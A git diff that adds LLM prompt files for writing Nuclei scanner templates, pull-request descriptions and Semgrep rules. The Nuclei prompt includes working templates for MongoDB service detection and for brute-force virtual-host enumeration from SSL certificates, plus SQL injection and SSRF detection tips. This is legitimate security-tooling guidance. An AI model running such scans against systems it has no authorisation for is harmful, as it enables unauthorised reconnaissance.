+When exclude-ports is used, the default reserved ports list will be overwritten. This means that if you want to run a network template on port 80, you will have to explicitly specify it in the port field.
+# Matchers / Extractor Parts
+Valid part values supported by Network protocol for Matchers / Extractor are:
+Value Description
+request Network Request
+data Final Data Read From Network Socket
+raw / body / all All Data received from Socket
+### Example Network Template
+The final example template file for a hex encoded input to detect MongoDB running on servers with working matchers is provided below.
+id: input-expressions-mongodb-detect
+ name: Input Expression MongoDB Detection
+ author: princechaddha
+ severity: info
+ reference:
+ - inputs:
+ - data: \"{{hex_decode(\'3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000\')}}\"
+ host:
+ - \"{{Hostname}}\"
+ port: 27017
+ read-size: 2048
+ matchers:
+ - type: word
+ words:
+ - \"logicalSessionTimeout\"
+ - \"localTime\"
+Request Execution Orchestration
+Flow is a powerful Nuclei feature that provides enhanced orchestration capabilities for executing requests. The simplicity of conditional execution is just the beginning. With flow, you can:
+Iterate over a list of values and execute a request for each one
+Extract values from a request, iterate over them, and perform another request for each
+Get and set values within the template context (global variables)
+Write output to stdout for debugging purposes or based on specific conditions
+Introduce custom logic during template execution
+Use ECMAScript 5.1 JavaScript features to build and modify variables at runtime
+Update variables at runtime and use them in subsequent requests.
+Think of request execution orchestration as a bridge between JavaScript and Nuclei, offering two-way interaction within a specific template.
+Practical Example: Vhost Enumeration
+To better illustrate the power of flow, let’s consider developing a template for vhost (virtual host) enumeration. This set of tasks typically requires writing a new tool from scratch. Here are the steps we need to follow:
+Retrieve the SSL certificate for the provided IP (using tlsx)
+Extract subject_cn (CN) from the certificate
+Extract subject_an (SAN) from the certificate
+Remove wildcard prefixes from the values obtained in the steps above
+Bruteforce the request using all the domains found from the SSL request
+You can utilize flow to simplify this task. The JavaScript code below orchestrates the vhost enumeration:
+for (let vhost of iterate(template[\"ssl_domains\"])) {
+ set(\"vhost\", vhost);
+ http();
+In this code, we’ve introduced 5 extra lines of JavaScript. This allows the template to perform vhost enumeration. The best part? You can run this at scale with all features of Nuclei, using supported inputs like ASN, CIDR, URL.
+Let’s break down the JavaScript code:
+ssl(): This function executes the SSL request.
+template[\"ssl_domains\"]: Retrieves the value of ssl_domains from the template context.
+iterate(): Helper function that iterates over any value type while handling empty or null values.
+set(\"vhost\", vhost): Creates a new variable vhost in the template and assigns the vhost variable’s value to it.
+http(): This function conducts the HTTP request.
+By understanding and taking advantage of Nuclei’s flow, you can redefine the way you orchestrate request executions, making your templates much more powerful and efficient.
+Here is working template for vhost enumeration using flow:
+id: vhost-enum-flow
+ name: vhost enum flow
+ author: tarunKoyalwar
+ severity: info
+ description: |
+ vhost enumeration by extracting potential vhost names from ssl certificate.
+flow: |
+ ssl();
+ for (let vhost of iterate(template[\"ssl_domains\"])) {
+ set(\"vhost\", vhost);
+ http();
+ }
+ - address: \"{{Host}}:{{Port}}\"
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{vhost}}
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code != 400
+ - status_code != 502
+ extractors:
+ - type: dsl
+ dsl:
+ - \'\"VHOST: \" + vhost + \", SC: \" + status_code + \", CL: \" + content_length\'
+JS Bindings
+This section contains a brief description of all nuclei JS bindings and their usage.
+Protocol Execution Function
+In nuclei, any listed protocol can be invoked or executed in JavaScript using the protocol_name() format. For example, you can use http(), dns(), ssl(), etc.
+If you want to execute a specific request of a protocol (refer to nuclei-flow-dns for an example), it can be achieved by passing either:
+The index of that request in the protocol (e.g.,dns(1), dns(2))
+The ID of that request in the protocol (e.g., dns(\"extract-vps\"), http(\"probe-http\"))
+For more advanced scenarios where multiple requests of a single protocol need to be executed, you can specify their index or ID one after the other (e.g., dns(“extract-vps”,“1”)).
+This flexibility in using either index numbers or ID strings to call specific protocol requests provides controls for tailored execution, allowing you to build more complex and efficient workflows. more complex use cases multiple requests of a single protocol can be executed by just specifying their index or id one after another (ex: dns(\"extract-vps\",\"1\"))
+Iterate Helper Function :
+Iterate is a nuclei js helper function which can be used to iterate over any type of value like array, map, string, number while handling empty/nil values.
+This is addon helper function from nuclei to omit boilerplate code of checking if value is empty or not and then iterating over it
+// iterate over array with custom separator
+iterate([1,2,3,4,5], \" \")
+Set Helper Function
+When iterating over a values/array or some other use case we might want to invoke a request with custom/given value and this can be achieved by using set() helper function. When invoked/called it adds given variable to template context (global variables) and that value is used during execution of request/protocol. the format of set() is set(\"variable_name\",value) ex: set(\"username\",\"admin\").
+for (let vhost of myArray) {
+ set(\"vhost\", vhost);
+ http(1)
+Note: In above example we used set(\"vhost\", vhost) which added vhost to template context (global variables) and then called http(1) which used this value in request.
+Template Context
+A template context is nothing but a map/jsonl containing all this data along with internal/unexported data that is only available at runtime (ex: extracted values from previous requests, variables added using set() etc). This template context is available in javascript as template variable and can be used to access any data from it. ex: template[\"dns_cname\"], template[\"ssl_subject_cn\"] etc.
+template[\"ssl_domains\"] // returns value of ssl_domains from template context which is available after executing ssl request
+template[\"ptrValue\"] // returns value of ptrValue which was extracted using regex with internal: true
+Lot of times we don’t known what all data is available in template context and this can be easily found by printing it to stdout using log() function
+Log Helper Function
+It is a nuclei js alternative to console.log and this pretty prints map data in readable format
+Note: This should be used for debugging purposed only as this prints data to stdout
+Lot of times just having arrays/slices is not enough and we might need to remove duplicate variables . for example in earlier vhost enumeration we did not remove any duplicates as there is always a chance of duplicate values in ssl_subject_cn and ssl_subject_an and this can be achieved by using dedupe() object. This is nuclei js helper function to abstract away boilerplate code of removing duplicates from array/slice
+let uniq = new Dedupe(); // create new dedupe object
+And that’s it, this automatically converts any slice/array to map and removes duplicates from it and returns a slice/array of unique values
+Similar to DSL helper functions . we can either use built in functions available with Javscript (ECMAScript 5.1) or use DSL helper functions and its upto user to decide which one to uses.
+ - method: GET # http request
+ path:
+ - \"{{BaseURL}}\"
+ matchers:
+ - type: dsl
+ dsl:
+ - contains(http_body,\'Domain not found\') # check for string from http response
+ - contains(dns_cname, \'\') # check for cname from dns response
+ condition: and
+The example above demonstrates that there is no need for new logic or syntax. Simply write the logic for each protocol and then use the protocol-prefixed variable or the dynamic extractor to export that variable. This variable is then shared across all protocols. We refer to this as the Template Context, which contains all variables that are scoped at the template level.
+Important Matcher Rules:
+- Try adding at least 2 matchers in a template it can be a response header or status code for the web templates.
+- Make sure the template have enough matchers to validate the issue properly. The matcher should be unique and also try not to add very strict matcher which may result in False negatives.
+- Just like the XSS templates SSRF template also results in False Positives so make sure to add additional matcher from the response to the template. We have seen honeypots sending request to any URL they may receive in GET/POST data which will result in FP if we are just using the HTTP/DNS interactsh matcher.
+- For Time-based SQL Injection templates, if we must have to add duration dsl for the detection, make sure to add additional string from the vulnerable endpoint to avoid any FP that can be due to network error.
+Make sure there are no yaml erros in a valid nuclei templates like the following
+- trailing spaces
+- wrong indentation errosr like: expected 10 but found 9
+- no new line character at the end of file
+- found unknown escape character
+- mapping values are not allowed in this context
+- found character that cannot start any token
+- did not find expected key
+- did not find expected alphabetic or numeric character
+- did not find expected \'-\' indicator- network: is deprecated, use tcp: instead
+- requests: is deprecated, use http: instead
+- unknown escape sequence
+- all_headers is deprecated, use header instead
+- at line
+- bad indentation of a mapping entry
+- bad indentation of a sequence entry
+- can not read a block mapping entry;
+- duplicated mapping key
+- is not allowed to have the additional
+- is not one of enum values
+- the stream contains non-printable characters
+- unexpected end of the stream within a
+- unidentified alias \"/*\"
+- unknown escape sequence. You can also remove unnecessary headers from requests if they are not required for the vulnerability.
+- Output only the correct yaml nuclei template like the EXAMPLES above
+- Keep the matcher in the nuclei template with proper indentation. The templates id should be the cve id or the product-vulnerability-name. The matcher should be indented inside the corresponding requests block. Your answer should be strictly based on the above example templates
+- Do not output warnings or notes—just the requested sections.
diff --git a/LlmPrompts/write_nuclei_template_rule/ b/LlmPrompts/write_nuclei_template_rule/
new file mode 100644
index 0000000..e69de29
diff --git a/LlmPrompts/write_pull-request/ b/LlmPrompts/write_pull-request/
new file mode 100644
index 0000000..8c3e5a5
--- /dev/null
+++ b/LlmPrompts/write_pull-request/
@@ -0,0 +1,98 @@
+You are an experienced software engineer about to open a PR. You are thorough and explain your changes well, you provide insights and reasoning for the change and enumerate potential bugs with the changes you've made.
+You take your time and consider the INPUT and draft a description of the pull request. The INPUT you will be reading is the output of the git diff command.
+The expected input format is command line output from git diff that compares all the changes of the current branch with the main repository branch.
+The syntax of the output of `git diff` is a series of lines that indicate changes made to files in a repository. Each line represents a change, and the format of each line depends on the type of change being made.
+Here are some examples of how the syntax of `git diff` might look for different types of changes:
+* Adding a file:
++++ b/newfile.txt
+@@ -0,0 +1 @@
++This is the contents of the new file.
+In this example, the line `+++ b/newfile.txt` indicates that a new file has been added, and the line `@@ -0,0 +1 @@` shows that the first line of the new file contains the text "This is the contents of the new file."
+* Deleting a file:
+--- a/oldfile.txt
++++ b/deleted
+@@ -1 +0,0 @@
+-This is the contents of the old file.
+In this example, the line `--- a/oldfile.txt` indicates that an old file has been deleted, and the line `@@ -1 +0,0 @@` shows that the last line of the old file contains the text "This is the contents of the old file." The line `+++ b/deleted` indicates that the file has been deleted.
+* Modifying a file:
+--- a/oldfile.txt
++++ b/newfile.txt
+@@ -1,3 +1,4 @@
+ This is an example of how to modify a file.
+-The first line of the old file contains this text.
+ The second line contains this other text.
++This is the contents of the new file.
+In this example, the line `--- a/oldfile.txt` indicates that an old file has been modified, and the line `@@ -1,3 +1,4 @@` shows that the first three lines of the old file have been replaced with four lines, including the new text "This is the contents of the new file."
+* Moving a file:
+--- a/oldfile.txt
++++ b/newfile.txt
+@@ -1 +1 @@
+ This is an example of how to move a file.
+In this example, the line `--- a/oldfile.txt` indicates that an old file has been moved to a new location, and the line `@@ -1 +1 @@` shows that the first line of the old file has been moved to the first line of the new file.
+* Renaming a file:
+--- a/oldfile.txt
++++ b/newfile.txt
+@@ -1 +1,2 @@
+ This is an example of how to rename a file.
++This is the contents of the new file.
+In this example, the line `--- a/oldfile.txt` indicates that an old file has been renamed to a new name, and the line `@@ -1 +1,2 @@` shows that the first line of the old file has been moved to the first two lines of the new file.
+1. Analyze the git diff output provided.
+2. Identify the changes made in the code, including added, modified, and deleted files.
+3. Understand the purpose of these changes by examining the code and any comments.
+4. Write a detailed pull request description in markdown syntax. This should include:
+ - A brief summary of the changes made.
+ - The reason for these changes.
+ - The impact of these changes on the overall project.
+5. Ensure your description is written in a "matter of fact", clear, and concise language.
+6. Use markdown code blocks to reference specific lines of code when necessary.
+7. Output only the PR description.
+1. **Summary**: Start with a brief summary of the changes made. This should be a concise explanation of the overall changes.
+2. **Files Changed**: List the files that were changed, added, or deleted. For each file, provide a brief description of what was changed and why.
+3. **Code Changes**: For each file, highlight the most significant code changes. Use markdown code blocks to reference specific lines of code when necessary.
+4. **Reason for Changes**: Explain the reason for these changes. This could be to fix a bug, add a new feature, improve performance, etc.
+5. **Impact of Changes**: Discuss the impact of these changes on the overall project. This could include potential performance improvements, changes in functionality, etc.
+6. **Test Plan**: Briefly describe how the changes were tested or how they should be tested.
+7. **Additional Notes**: Include any additional notes or comments that might be helpful for understanding the changes.
+Remember, the output should be in markdown format, clear, concise, and understandable even for someone who is not familiar with the project.
+$> git --no-pager diff main
diff --git a/LlmPrompts/write_semgrep_rule/ b/LlmPrompts/write_semgrep_rule/
new file mode 100644
index 0000000..fe7b8a8
--- /dev/null
+++ b/LlmPrompts/write_semgrep_rule/
@@ -0,0 +1,751 @@
+You are an expert at writing Semgrep rules.
+Take a deep breath and think step by step about how to best accomplish this goal using the following context.
+- Write a Semgrep rule that will match the input provided.
+This context will teach you about how to write better Semgrep rules:
+You are an expert Semgrep rule creator.
+Take a deep breath and work on this problem step-by-step.
+You output only a working Semgrep rule.
+user_message = {
+"role": "user",
+"content": """
+You are an expert Semgrep rule creator.
+You output working and accurate Semgrep rules.
+Take a deep breath and work on this problem step-by-step.
+Rule syntax
+Getting started with rule writing? Try the Semgrep Tutorial 🎓
+This document describes the YAML rule syntax of Semgrep.
+All required fields must be present at the top-level of a rule, immediately under the rules key.
+Field Type Description
+id string Unique, descriptive identifier, for example: no-unused-variable
+message string Message that includes why Semgrep matched this pattern and how to remediate it. See also Rule messages.
+severity string One of the following values: INFO (Low severity), WARNING (Medium severity), or ERROR (High severity). The severity key specifies how critical are the issues that a rule potentially detects. Note: Semgrep Supply Chain differs, as its rules use CVE assignments for severity. For more information, see Filters section in Semgrep Supply Chain documentation.
+languages array See language extensions and tags
+pattern* string Find code matching this expression
+patterns* array Logical AND of multiple patterns
+pattern-either* array Logical OR of multiple patterns
+pattern-regex* string Find code matching this PCRE-compatible pattern in multiline mode
+Only one of the following is required: pattern, patterns, pattern-either, pattern-regex
+Language extensions and languages key values
+The following table includes languages supported by Semgrep, accepted file extensions for test files that accompany rules, and valid values that Semgrep rules require in the languages key.
+Language Extensions languages key values
+Apex (only in Semgrep Pro Engine) .cls apex
+Bash .bash, .sh bash, sh
+C .c c
+Cairo .cairo cairo
+Clojure .clj, .cljs, .cljc, .edn clojure
+C++ .cc, .cpp cpp, c++
+C# .cs csharp, c#
+Dart .dart dart
+Dockerfile .dockerfile, .Dockerfile dockerfile, docker
+Elixir .ex, .exs ex, elixir
+Generic generic
+Go .go go, golang
+HTML .htm, .html html
+Java .java java
+JavaScript .js, .jsx js, javascript
+JSON .json, .ipynb json
+Jsonnet .jsonnet, .libsonnet jsonnet
+JSX .js, .jsx js, javascript
+Julia .jl julia
+Kotlin .kt, .kts, .ktm kt, kotlin
+Lisp .lisp, .cl, .el lisp
+Lua .lua lua
+OCaml .ml, .mli ocaml
+PHP .php, .tpl php
+Python .py, .pyi python, python2, python3, py
+R .r, .R r
+Ruby .rb ruby
+Rust .rs rust
+Scala .scala scala
+Scheme .scm, .ss scheme
+Solidity .sol solidity, sol
+Swift .swift swift
+Terraform .tf, .hcl tf, hcl, terraform
+TypeScript .ts, .tsx ts, typescript
+YAML .yml, .yaml yaml
+XML .xml xml
+To see the maturity level of each supported language, see the following sections in Supported languages document:
+Semgrep OSS Engine
+Semgrep Pro Engine
+Field Type Description
+options object Options object to enable/disable certain matching features
+fix object Simple search-and-replace autofix functionality
+metadata object Arbitrary user-provided data; attach data to rules without affecting Semgrep behavior
+min-version string Minimum Semgrep version compatible with this rule
+max-version string Maximum Semgrep version compatible with this rule
+paths object Paths to include or exclude when running this rule
+The below optional fields must reside underneath a patterns or pattern-either field.
+Field Type Description
+pattern-inside string Keep findings that lie inside this pattern
+The below optional fields must reside underneath a patterns field.
+Field Type Description
+metavariable-regex map Search metavariables for Python re compatible expressions; regex matching is unanchored
+metavariable-pattern map Matches metavariables with a pattern formula
+metavariable-comparison map Compare metavariables against basic Python expressions
+pattern-not string Logical NOT - remove findings matching this expression
+pattern-not-inside string Keep findings that do not lie inside this pattern
+pattern-not-regex string Filter results using a PCRE-compatible pattern in multiline mode
+The pattern operator looks for code matching its expression. This can be basic expressions like $X == $X or unwanted function calls like hashlib.md5(...).
+Try this pattern in the Semgrep Playground.
+The patterns operator performs a logical AND operation on one or more child patterns. This is useful for chaining multiple patterns together that all must be true.
+Try this pattern in the Semgrep Playground.
+patterns operator evaluation strategy
+Note that the order in which the child patterns are declared in a patterns operator has no effect on the final result. A patterns operator is always evaluated in the same way:
+Semgrep evaluates all positive patterns, that is pattern-insides, patterns, pattern-regexes, and pattern-eithers. Each range matched by each one of these patterns is intersected with the ranges matched by the other operators. The result is a set of positive ranges. The positive ranges carry metavariable bindings. For example, in one range $X can be bound to the function call foo(), and in another range $X can be bound to the expression a + b.
+Semgrep evaluates all negative patterns, that is pattern-not-insides, pattern-nots, and pattern-not-regexes. This gives a set of negative ranges which are used to filter the positive ranges. This results in a strict subset of the positive ranges computed in the previous step.
+Semgrep evaluates all conditionals, that is metavariable-regexes, metavariable-patterns and metavariable-comparisons. These conditional operators can only examine the metavariables bound in the positive ranges in step 1, that passed through the filter of negative patterns in step 2. Note that metavariables bound by negative patterns are not available here.
+Semgrep applies all focus-metavariables, by computing the intersection of each positive range with the range of the metavariable on which we want to focus. Again, the only metavariables available to focus on are those bound by positive patterns.
+The pattern-either operator performs a logical OR operation on one or more child patterns. This is useful for chaining multiple patterns together where any may be true.
+Try this pattern in the Semgrep Playground.
+This rule looks for usage of the Python standard library functions hashlib.md5 or hashlib.sha1. Depending on their usage, these hashing functions are considered insecure.
+The pattern-regex operator searches files for substrings matching the given PCRE pattern. This is useful for migrating existing regular expression code search functionality to Semgrep. Perl-Compatible Regular Expressions (PCRE) is a full-featured regex library that is widely compatible with Perl, but also with the respective regex libraries of Python, JavaScript, Go, Ruby, and Java. Patterns are compiled in multiline mode, for example ^ and $ matches at the beginning and end of lines respectively in addition to the beginning and end of input.
+PCRE supports only a limited number of Unicode character properties. For example, \p{Egyptian_Hieroglyphs} is supported but \p{Bidi_Control} isn't.
+pattern-regex combined with other pattern operators: Semgrep Playground example
+pattern-regex used as a standalone, top-level operator: Semgrep Playground example
+Single (') and double (") quotes behave differently in YAML syntax. Single quotes are typically preferred when using backslashes (\) with pattern-regex.
+Note that you may bind a section of a regular expression to a metavariable, by using named capturing groups. In this case, the name of the capturing group must be a valid metavariable name.
+Try this pattern in the Semgrep Playground.
+The pattern-not-regex operator filters results using a PCRE regular expression in multiline mode. This is most useful when combined with regular-expression only rules, providing an easy way to filter findings without having to use negative lookaheads. pattern-not-regex works with regular pattern clauses, too.
+The syntax for this operator is the same as pattern-regex.
+This operator filters findings that have any overlap with the supplied regular expression. For example, if you use pattern-regex to detect Foo==1.1.1 and it also detects Foo-Bar==3.0.8 and Bar-Foo==3.0.8, you can use pattern-not-regex to filter the unwanted findings.
+Try this pattern in the Semgrep Playground.
+The focus-metavariable operator puts the focus, or zooms in, on the code region matched by a single metavariable or a list of metavariables. For example, to find all functions arguments annotated with the type bad you may write the following pattern:
+pattern: |
+def $FUNC(..., $ARG : bad, ...):
+This works but it matches the entire function definition. Sometimes, this is not desirable. If the definition spans hundreds of lines they are all matched. In particular, if you are using Semgrep Cloud Platform and you have triaged a finding generated by this pattern, the same finding shows up again as new if you make any change to the definition of the function!
+To specify that you are only interested in the code matched by a particular metavariable, in our example $ARG, use focus-metavariable.
+Try this pattern in the Semgrep Playground.
+Note that focus-metavariable: $ARG is not the same as pattern: $ARG! Using pattern: $ARG finds all the uses of the parameter x which is not what we want! (Note that pattern: $ARG does not match the formal parameter declaration, because in this context $ARG only matches expressions.)
+Try this pattern in the Semgrep Playground.
+In short, focus-metavariable: $X is not a pattern in itself, it does not perform any matching, it only focuses the matching on the code already bound to $X by other patterns. Whereas pattern: $X matches $X against your code (and in this context, $X only matches expressions)!
+Including multiple focus metavariables using set intersection semantics
+Include more focus-metavariable keys with different metavariables under the pattern to match results only for the overlapping region of all the focused code:
+ patterns:
+ - pattern: foo($X, ..., $Y)
+ - focus-metavariable:
+ - $X
+ - $Y
+Try this pattern in the Semgrep Playground.
+To make a list of multiple focus metavariables using set union semantics that matches the metavariables regardless of their position in code, see Including multiple focus metavariables using set union semantics documentation.
+The metavariable-regex operator searches metavariables for a PCRE regular expression. This is useful for filtering results based on a metavariable’s value. It requires the metavariable and regex keys and can be combined with other pattern operators.
+Try this pattern in the Semgrep Playground.
+Regex matching is unanchored. For anchored matching, use \A for start-of-string anchoring and \Z for end-of-string anchoring. The next example, using the same expression as above but anchored, finds no matches:
+Try this pattern in the Semgrep Playground.
+Include quotes in your regular expression when using metavariable-regex to search string literals. For more details, see include-quotes code snippet. String matching functionality can also be used to search string literals.
+The metavariable-pattern operator matches metavariables with a pattern formula. This is useful for filtering results based on a metavariable’s value. It requires the metavariable key, and exactly one key of pattern, patterns, pattern-either, or pattern-regex. This operator can be nested as well as combined with other operators.
+For example, the metavariable-pattern can be used to filter out matches that do not match certain criteria:
+Try this pattern in the Semgrep Playground.
+In this case it is possible to start a patterns AND operation with a pattern-not, because there is an implicit pattern: ... that matches the content of the metavariable.
+The metavariable-pattern is also useful in combination with pattern-either:
+Try this pattern in the Semgrep Playground.
+It is possible to nest metavariable-pattern inside metavariable-pattern!
+The metavariable should be bound to an expression, a statement, or a list of statements, for this test to be meaningful. A metavariable bound to a list of function arguments, a type, or a pattern, always evaluate to false.
+metavariable-pattern with nested language
+If the metavariable's content is a string, then it is possible to use metavariable-pattern to match this string as code by specifying the target language via the language key. See the following examples of metavariable-pattern:
+EXAMPLES OF metavariable-pattern
+Match JavaScript code inside HTML in the following Semgrep Playground example.
+Filter regex matches in the following Semgrep Playground example.
+The metavariable-comparison operator compares metavariables against a basic Python comparison expression. This is useful for filtering results based on a metavariable's numeric value.
+The metavariable-comparison operator is a mapping which requires the metavariable and comparison keys. It can be combined with other pattern operators in the following Semgrep Playground example.
+This matches code such as set_port(80) or set_port(443), but not set_port(8080).
+Comparison expressions support simple arithmetic as well as composition with boolean operators to allow for more complex matching. This is particularly useful for checking that metavariables are divisible by particular values, such as enforcing that a particular value is even or odd.
+Try this pattern in the Semgrep Playground.
+Building on the previous example, this still matches code such as set_port(80) but it no longer matches set_port(443) or set_port(8080).
+The comparison key accepts Python expression using:
+Boolean, string, integer, and float literals.
+Boolean operators not, or, and and.
+Arithmetic operators +, -, \*, /, and %.
+Comparison operators ==, !=, <, <=, >, and >=.
+Function int() to convert strings into integers.
+Function str() to convert numbers into strings.
+Function today() that gets today's date as a float representing epoch time.
+Function strptime() that converts strings in the format "yyyy-mm-dd" to a float representing the date in epoch time.
+Lists, together with the in, and not in infix operators.
+Strings, together with the in and not in infix operators, for substring containment.
+Function re.match() to match a regular expression (without the optional flags argument).
+You can use Semgrep metavariables such as $MVAR, which Semgrep evaluates as follows:
+If $MVAR binds to a literal, then that literal is the value assigned to $MVAR.
+If $MVAR binds to a code variable that is a constant, and constant propagation is enabled (as it is by default), then that constant is the value assigned to $MVAR.
+Otherwise the code bound to the $MVAR is kept unevaluated, and its string representation can be obtained using the str() function, as in str($MVAR). For example, if $MVAR binds to the code variable x, str($MVAR) evaluates to the string literal "x".
+Legacy metavariable-comparison keys
+You can avoid the use of the legacy keys described below (base: int and strip: bool) by using the int() function, as in int($ARG) > 0o600 or int($ARG) > 2147483647.
+The metavariable-comparison operator also takes optional base: int and strip: bool keys. These keys set the integer base the metavariable value should be interpreted as and remove quotes from the metavariable value, respectively.
+EXAMPLE OF metavariable-comparison WITH base
+Try this pattern in the Semgrep Playground.
+This interprets metavariable values found in code as octal. As a result, Semgrep detects 0700, but it does not detect 0400.
+EXAMPLE OF metavariable-comparison WITH strip
+Try this pattern in the Semgrep Playground.
+This removes quotes (', ", and `) from both ends of the metavariable content. As a result, Semgrep detects "2147483648", but it does not detect "2147483646". This is useful when you expect strings to contain integer or float data.
+The pattern-not operator is the opposite of the pattern operator. It finds code that does not match its expression. This is useful for eliminating common false positives.
+Try this pattern in the Semgrep Playground.
+The pattern-inside operator keeps matched findings that reside within its expression. This is useful for finding code inside other pieces of code like functions or if blocks.
+Try this pattern in the Semgrep Playground.
+The pattern-not-inside operator keeps matched findings that do not reside within its expression. It is the opposite of pattern-inside. This is useful for finding code that’s missing a corresponding cleanup action like disconnect, close, or shutdown. It’s also useful for finding problematic code that isn't inside code that mitigates the issue.
+Try this pattern in the Semgrep Playground.
+The above rule looks for files that are opened but never closed, possibly leading to resource exhaustion. It looks for the open(...) pattern and not a following close() pattern.
+The $F metavariable ensures that the same variable name is used in the open and close calls. The ellipsis operator allows for any arguments to be passed to open and any sequence of code statements in-between the open and close calls. The rule ignores how open is called or what happens up to a close call — it only needs to make sure close is called.
+Metavariable matching
+Metavariable matching operates differently for logical AND (patterns) and logical OR (pattern-either) parent operators. Behavior is consistent across all child operators: pattern, pattern-not, pattern-regex, pattern-inside, pattern-not-inside.
+Metavariables in logical ANDs
+Metavariable values must be identical across sub-patterns when performing logical AND operations with the patterns operator.
+- id: function-args-to-open
+ patterns:
+ - pattern-inside: |
+ def $F($X):
+ ...
+ - pattern: open($X)
+ message: "Function argument passed to open() builtin"
+ languages: [python]
+ severity: ERROR
+This rule matches the following code:
+def foo(path):
+The example rule doesn’t match this code:
+def foo(path):
+Metavariables in logical ORs
+Metavariable matching does not affect the matching of logical OR operations with the pattern-either operator.
+- id: insecure-function-call
+ pattern-either:
+ - pattern: insecure_func1($X)
+ - pattern: insecure_func2($X)
+ message: "Insecure function use"
+ languages: [python]
+ severity: ERROR
+The above rule matches both examples below:
+Metavariables in complex logic
+Metavariable matching still affects subsequent logical ORs if the parent is a logical AND.
+- pattern-inside: |
+ def $F($X):
+ ...
+- pattern-either:
+ - pattern: bar($X)
+ - pattern: baz($X)
+The above rule matches both examples below:
+def foo(something):
+def foo(something):
+The example rule doesn’t match this code:
+def foo(something):
+Enable, disable, or modify the following matching features:
+Option Default Description
+ac_matching true Matching modulo associativity and commutativity, treat Boolean AND/OR as associative, and bitwise AND/OR/XOR as both associative and commutative.
+attr_expr true Expression patterns (for example: f($X)) matches attributes (for example: @f(a)).
+commutative_boolop false Treat Boolean AND/OR as commutative even if not semantically accurate.
+constant_propagation true Constant propagation, including intra-procedural flow-sensitive constant propagation.
+generic_comment_style none In generic mode, assume that comments follow the specified syntax. They are then ignored for matching purposes. Allowed values for comment styles are:
+c for traditional C-style comments (/_ ... _/).
+cpp for modern C or C++ comments (// ... or /_ ... _/).
+shell for shell-style comments (# ...).
+By default, the generic mode does not recognize any comments. Available since Semgrep version 0.96. For more information about generic mode, see Generic pattern matching documentation.
+generic_ellipsis_max_span 10 In generic mode, this is the maximum number of newlines that an ellipsis operator ... can match or equivalently, the maximum number of lines covered by the match minus one. The default value is 10 (newlines) for performance reasons. Increase it with caution. Note that the same effect as 20 can be achieved without changing this setting and by writing ... ... in the pattern instead of .... Setting it to 0 is useful with line-oriented languages (for example INI or key-value pairs in general) to force a match to not extend to the next line of code. Available since Semgrep 0.96. For more information about generic mode, see Generic pattern matching documentation.
+taint_assume_safe_functions false Experimental option which will be subject to future changes. Used in taint analysis. Assume that function calls do not propagate taint from their arguments to their output. Otherwise, Semgrep always assumes that functions may propagate taint. Can replace not-conflicting sanitizers added in v0.69.0 in the future.
+taint_assume_safe_indexes false Used in taint analysis. Assume that an array-access expression is safe even if the index expression is tainted. Otherwise Semgrep assumes that for example: a[i] is tainted if i is tainted, even if a is not. Enabling this option is recommended for high-signal rules, whereas disabling is preferred for audit rules. Currently, it is disabled by default to attain backwards compatibility, but this can change in the near future after some evaluation.
+vardef_assign true Assignment patterns (for example $X = $E) match variable declarations (for example var x = 1;).
+xml_attrs_implicit_ellipsis true Any XML/JSX/HTML element patterns have implicit ellipsis for attributes (for example: matches .
+The full list of available options can be consulted in the Semgrep matching engine configuration module. Note that options not included in the table above are considered experimental, and they may change or be removed without notice.
+The fix top-level key allows for simple autofixing of a pattern by suggesting an autofix for each match. Run semgrep with --autofix to apply the changes to the files.
+- id: use-dict-get
+ patterns:
+ - pattern: $DICT[$KEY]
+ fix: $DICT.get($KEY)
+ message: "Use `.get()` method to avoid a KeyNotFound error"
+ languages: [python]
+ severity: ERROR
+For more information about fix and --autofix see Autofix documentation.
+Provide additional information for a rule with the metadata: key, such as a related CWE, likelihood, OWASP.
+- id: eqeq-is-bad
+ patterns:
+ - [...]
+ message: "useless comparison operation `$X == $X` or `$X != $X`"
+ metadata:
+ cve: CVE-2077-1234
+ discovered-by: Ikwa L'equale
+The metadata are also displayed in the output of Semgrep if you’re running it with --json. Rules with category: security have additional metadata requirements. See Including fields required by security category for more information.
+min-version and max-version
+Each rule supports optional fields min-version and max-version specifying minimum and maximum Semgrep versions. If the Semgrep version being used doesn't satisfy these constraints, the rule is skipped without causing a fatal error.
+Example rule:
+- id: bad-goflags
+ # earlier semgrep versions can't parse the pattern
+ min-version: 1.31.0
+ pattern: |
+ ENV ... GOFLAGS='-tags=dynamic -buildvcs=false' ...
+ languages: [dockerfile]
+ message: "We should not use these flags"
+ severity: WARNING
+Another use case is when a newer version of a rule works better than before but relies on a new feature. In this case, we could use min-version and max-version to ensure that either the older or the newer rule is used but not both. The rules would look like this:
+- id: something-wrong-v1
+ max-version: 1.72.999
+ ...
+- id: something-wrong-v2
+ min-version: 1.73.0
+ # 10x faster than v1!
+ ...
+The min-version/max-version feature is available since Semgrep 1.38.0. It is intended primarily for publishing rules that rely on newly-released features without causing errors in older Semgrep installations.
+Provide a category for users of the rule. For example: best-practice, correctness, maintainability. For more information, see Semgrep registry rule requirements.
+Excluding a rule in paths
+To ignore a specific rule on specific files, set the paths: key with one or more filters. Paths are relative to the root directory of the scanned project.
+- id: eqeq-is-bad
+ pattern: $X == $X
+ paths:
+ exclude: - "_.jinja2" - "_\_test.go" - "project/tests" - project/static/\*.js
+When invoked with semgrep -f rule.yaml project/, the above rule runs on files inside project/, but no results are returned for:
+any file with a .jinja2 file extension
+any file whose name ends in \_test.go, such as project/backend/server_test.go
+any file inside project/tests or its subdirectories
+any file matching the project/static/\*.js glob pattern
+The glob syntax is from Python's wcmatch and is used to match against the given file and all its parent directories.
+Limiting a rule to paths
+Conversely, to run a rule only on specific files, set a paths: key with one or more of these filters:
+- id: eqeq-is-bad
+ pattern: $X == $X
+ paths:
+ include: - "_\_test.go" - "project/server" - "project/schemata" - "project/static/_.js" - "tests/\*_/_.js"
+When invoked with semgrep -f rule.yaml project/, this rule runs on files inside project/, but results are returned only for:
+files whose name ends in \_test.go, such as project/backend/server_test.go
+files inside project/server, project/schemata, or their subdirectories
+files matching the project/static/\*.js glob pattern
+all files with the .js extension, arbitrary depth inside the tests folder
+If you are writing tests for your rules, add any test file or directory to the included paths as well.
+When mixing inclusion and exclusion filters, the exclusion ones take precedence.
+include: "project/schemata"
+exclude: "\*\"
+The above rule returns results from project/schemata/ but not from project/schemata/
+Other examples
+This section contains more complex rules that perform advanced code searching.
+Complete useless comparison
